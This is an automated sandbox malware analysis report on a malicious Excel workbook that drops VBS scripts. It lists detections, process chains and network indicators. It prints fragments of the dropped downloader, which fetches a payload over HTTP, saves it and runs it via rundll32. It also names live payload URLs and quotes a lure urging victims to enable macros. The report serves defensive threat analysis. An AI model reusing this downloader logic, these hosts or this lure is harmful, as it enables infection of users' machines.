Loading ...

Play interactive tourEdit tour

Analysis Report notif.5581.xls

Overview

General Information

Sample Name:notif.5581.xls
Analysis ID:289231
MD5:f9b6cf62fa1ba79e74b7ae3e412ccde0
SHA1:cb5a5d56dda147951ed940814100b21769d1f567
SHA256:ff38a7c0c301e273a6c2197ad35f3d458c9c8e660048dbceb7dfb05932d41340

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Launcher Generic
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2416 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 2576 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2804 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 3016 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2392 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2772 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 824 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2904 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2992 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 3028 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\KdHUdD1.vbsJoeSecurity_VBSLauncherGenericYara detected VBS Launcher GenericJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Office product drops script at suspicious locationShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2416, TargetFilename: C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Spreading:

    barindex
    Yara detected VBS Launcher GenericShow sources
    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs, type: DROPPED

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\egBLrMHS.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\KdHUdD1.vbsJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: global trafficDNS query: name: beautifulday.site
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.27.137.242:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.27.137.242:443

    Networking:

    barindex
    Potential malicious VBS script found (has network functionality)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vvuh.Openvvuh.Type = 1vvuh.Write q6dU3SXj.ResponseBodyJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vvuh.Openvvuh.Type = 1vvuh.Write q6dU3SXj.ResponseBodyJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vvuh.SaveToFile "C:\Users\user\AppData\Local\Temp\KEc.html",2vvuh.CloseExit ForEnd IfNextJump to dropped file
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: beautifulday.site
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
    Source: explorer.exe, 00000002.00000002.2105477176.0000000001DA0000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2232235703.0000000001CC0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2114520880.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.2241511820.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: explorer.exe, 00000003.00000002.2233036283.0000000002890000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.2105389727.0000000001B40000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.2119411091.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: explorer.exe, 00000002.00000002.2105477176.0000000001DA0000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2232235703.0000000001CC0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2114520880.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.2241511820.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: wscript.exe, 00000008.00000003.2118006173.00000000040DB000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/
    Source: wscript.exe, 00000008.00000003.2118937539.0000000000352000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.2119395782.0000000000426000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.2119336485.000000000034C000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php
    Source: wscript.exe, 00000008.00000002.2119336485.000000000034C000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php6
    Source: wscript.exe, 00000008.00000002.2119395782.0000000000426000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpa6
    Source: wscript.exe, 00000008.00000002.2119336485.000000000034C000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpvbs
    Source: wscript.exe, 00000008.00000003.2118937539.0000000000352000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.php
    Source: wscript.exe, 00000008.00000003.2118937539.0000000000352000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.phpE
    Source: wscript.exe, 00000008.00000002.2119395782.0000000000426000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.phpz
    Source: wscript.exe, 00000008.00000003.2118006173.00000000040DB000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
    Source: wscript.exe, 00000008.00000003.2118006173.00000000040DB000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
    Source: wscript.exe, 00000008.00000003.2118006173.00000000040DB000.00000004.00000001.sdmpString found in binary or memory: https://plusone.google.com/u/0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: wscript.exe, 00000008.00000002.2120225994.0000000004083000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: wscript.exe, 00000008.00000003.2118516702.00000000003D2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
    Source: wscript.exe, 00000008.00000003.2118006173.00000000040DB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/setprefdomain?prefdom=GB&prev=https://www.google.co.uk/&sig=K_Ziwfzu7
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" button from the yellow bar above. 11 Once You have enabled editing, please click "E
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button. 12 13 14 L, 16 17 18 19 20 21 22 23 24 'GJ ',9 "0],| UL .
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: notif.5581.xlsInitial sample: WORKSPACE
    Microsoft Office drops suspicious filesShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\egBLrMHS.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\KdHUdD1.vbsJump to behavior
    Potential malicious VBS script found (suspicious strings)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: vXW3 = Array(Qmge91no,lzT,Hwg,OJFMw)Dim q6dU3SXj: Set q6dU3SXj = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: fGm9.Document.Application.ShellExecute "rundll32.exe","C:\Users\user\AppData\Local\Temp\KEc.html,DllRegisterServer","C:\Windows\System32",Null,0Jump to dropped file
    Source: notif.5581.xlsOLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow title found: microsoft excel okthe workbook cannot be opened or repaired by microsoft excel because it is corrupt.
    Source: wscript.exe, 00000008.00000002.2120765146.00000000059A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.spre.expl.evad.winXLS@16/10@2/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0DDE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD3F1.tmpJump to behavior
    Source: notif.5581.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs'
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbs'
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\egBLrMHS.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\KdHUdD1.vbsJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\egBLrMHS.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\SFGG6bFs.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\KdHUdD1.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\explorer.exe TID: 2524Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2524Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2332Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 260Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 260Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2860Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 2400Thread sleep time: -60000s >= -30000sJump to behavior
